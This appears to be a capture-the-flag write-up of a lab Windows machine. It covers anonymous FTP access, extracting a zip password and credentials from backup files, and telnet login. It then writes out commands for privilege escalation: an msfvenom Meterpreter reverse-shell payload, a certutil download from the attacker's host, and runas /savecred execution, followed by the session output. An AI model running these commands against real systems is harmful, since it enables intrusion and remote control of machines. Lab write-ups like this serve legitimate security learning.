TL;DR
Anonymous login to a FTP server allowed access to backups files. From the backups, a password for a protected zip could be found. The archive contained emails which contained credentials to connect to telnet allowing a user level shell. runas
could then be used to execute a reverse shell as the Administrator because the account had saved credentials.
User
As ever lets throw Nmap
at it and see what it reveals.
# Nmap 7.70 scan initiated Sat Sep 29 15:00:27 2018 as: nmap -sV -sS -sC -o nmap-initial.txt 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.074s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
|_tomcat-scan: /manager/html is HTTP 404.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 29 15:03:57 2018 -- 1 IP address (1 host up) scanned in 210.29 seconds
This scan reveals 3 open ports:
- 21/tcp - A FTP server - The default scripts have determined that anonymous login is allowed this means that there are likely to be files we can access.
- 23/tcp - Telnet - Telnet wants a username and password for authentication that we don't have yet.
- 80/tcp - HTTP - At a glance there is nothing useful here
FTP Server
Nmap determined that the FTP server allowed anonymous logins. This means that after we connect to the server with ftp 10.10.10.98
we can login with the default credentials of anonymous
and a blank password.
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM <DIR> Backups
08-24-18 09:00PM <DIR> Engineer
226 Transfer complete.
We are greeted by two directories the first Backups
contains a file named backup.mdb
and the second Engineer
contains a file named Access Control.zip
we can download them with get
.
ftp> cd Backups
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18 08:16PM 5652480 backup.mdb
226 Transfer complete.
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
5652480 bytes received in 3.23 secs (1.6692 MB/s)
ftp> cd ..
250 CWD command successful.
ftp> cd Engineer
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18 12:16AM 10870 Access Control.zip
226 Transfer complete.
ftp> get Access Control.zip
local: Control.zip remote: Access
200 PORT command successful.
550 The system cannot find the file specified.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
10870 bytes received in 0.13 secs (80.7015 kB/s)
We now have two files from the FTP server. The first appears to be a Microsoft Access Database and the second a password protected zip.
backup.mdb
Running strings
on backup.mdb
we are presented with the ascii text from the file. Running simply strings backup.mdb
produces too much noise so setting the -n
option refines the search to remove noise. Running strings -n 10 backup.mdb
is a sufficient filter and some potential passwords can be seen. Likely to be for the zip file.
JMOLqQikYdb
MWQM\YbMd^di
MWQM\domMd^di
OLqQikYdbJMMQkk
`YbkbdLiQJ\Yb
`YbkbdLiQJ\dom
`Ybkbd^QJqQ
`YbkbdmdqQimY`Q
`Ybksdi\OJv
bdLiQJ\dom
domdqQimY`Q
administrator;
Administrator<
4555555555555Q
ppermission
backup_admin
[email protected] <--- Looks Suspicious to me
Access Control.zip
[email protected]
is in fact the password for the zip. However, you'll find that it can't be extracted using unzip
with it citing unsupported compression method 99
. If you look up compression method 99
you'll find that it uses AES encryption which isn't currently supported by the unzip
binary. Luckily, the system archive manager (in Gnome at least) can be used as an alternative.
Within the zip is a .pst file using file to determine its type yields.Access Control.pst: Microsoft Outlook email folder (>=2003)
When I first did this box, I'll be honest i just found an online converter to view the file and while its not the best practice in the heat of the moment while the blood was still very much up for grabs it worked.
However, you could say the proper way of doing this was with the readpst
command.
readpst -o ./ Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
"Access Control" - 2 items done, 0 items skipped.
The email can then clearly be seen in the 2.eml
file it will create.
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
John
Either way once the email is extracted we obtain the username security
and a password 4Cc3ssC0ntr0ller
. This will likely be for telnet.
Telnet
After using telnet 10.10.10.98
it is seen that is in fact the case as these credentials are accepted. Once connected you can navigate to the user.txt
flag and print it with type user.txt
.
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>cd Desktop
C:\Users\security\Desktop>type user.txt
Root
Start msfconsole
and load the exploit listener with use exploit/multi/handler
. Next set the payload as windows/meterpreter/reverse_tcp
and populate the options as required for your needs and start the listener with run
.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.13.37.10
lhost => 10.13.37.10
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.13.37.10 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.13.37.10:4444
Next we need to generate a payload to do this we will use:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.37.10 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Now we need to host this file so that we can access it, to do this we will use python's SimpleHTTPServer
python -m SimpleHTTPServer 80
Then to download the shell we can make use of certutil
(this may not work on all versions of Windows) as we are using certutil
we have to host the web server on port 80 instead of the default 8000.
certutil.exe -urlcache -split -f http://10.10.MY.IP/shell.exe shell.exe
Finally we run runas /savecred /user:ACCESS\Administrator shell.exe
to execute the shell as the administrator. This can be done because the account has saved credentials.
C:\Users\security\Desktop>cd C:\temp
C:\temp>certutil.exe -urlcache -split -f http://10.10.14.1/shell.exe shell.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.
C:\temp>runas /savecred /user:ACCESS\Administrator shell.exe
C:\temp>
If you look at the msfconsole
you should now have a privileged shell waiting for you that can be used to read root.txt
.
[*] Started reverse TCP handler on 10.10.13.37:4444
[*] Sending stage (179779 bytes) to 10.10.10.98
[*] Meterpreter session 1 opened (10.10.13.37:4444 -> 10.10.10.98:49200)
meterpreter > shell
Process 3428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt